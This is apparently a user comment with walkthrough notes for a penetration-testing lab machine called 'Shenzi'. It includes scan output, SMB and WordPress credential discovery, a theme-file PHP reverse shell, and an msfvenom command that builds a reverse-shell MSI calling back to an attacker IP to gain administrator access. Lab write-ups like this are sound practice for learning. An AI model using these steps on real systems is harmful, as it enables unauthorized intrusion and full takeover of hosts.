WDavid404
commented
1 month ago PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql? syn-ack ttl 125
|_ MySQL Error: Host '192.168.45.205' is not allowed to connect to this MariaDB server
5040/tcp open unknown syn-ack ttl 125
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC21/tcp
Anonymouse login --> failed
139/tcp, 445/tcp (SMB):
--> enum4linux --> no info
smbmap -u null -p "" -H 192.168.198.55 -P 445 -r 2>&1
-->
smbclient //192.168.198.55/Shenzi
Downloads files and check them:
- password.txt
MySQL (phpMyAdmin): User: root Password: (means no password!) ...... Wordpress: User: admin Password: FeltHeadwallWight357Try put a file --> Failed
80/tcp, 443/tcp:
--> XAMPP 7.4.6
Search exploit info for XAMPP 7.4.6, fastly, apache 2.4.43, php 7.4.6 --> No
/phpmyadmin --> Access forbidden! Access to the requested directory is only available from the local network.
/phpinfo
-->
DOCUMENT_ROOT C:/xampp/htdocs
username: Shenzi
One useful tip for lab machines is to try out any useful keywords you’ve identified so far to identify directories, usernames or passwords. Turns out there is a wordpress website hosted at /Shenzi.
Try accessing http://192.168.198.55/shenzi/ --> work! and it was made by wordpress
wpscan --url http://192.168.198.55/shenzi -e ap,at,u --plugins-detection aggressive -t 20
--> no useful info
http://192.168.198.55/shenzi/wp-admin
--> input admin:FeltHeadwallWight357
--> Login succeessfully
Appearance --> Theme Editor --> 404.php
Change content to php reverse shell code that generated via https://www.revshells.com/ (Use "php Ivan Sincek". "php PentestMonkey" didn't work..)
Accesss "http://192.168.198.55/shenzi/wp-admin/theme/404.php"
--> Got reverse shell
PE
whoami /priv -->no useful info
winpeas
-->
If these 2 registers are enabled (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
so, made a msi file on Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=443 -f msi -o shell.msi
upload msi file to the target host and run it ./shell.msi
We got a reverse shell as administrator user!
Keypoints:
--> made a msi file on Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=443 -f msi -o shell.msiupload msi file to the target host and run it ./shell.msi then, we can get a reverse shell as administrator user!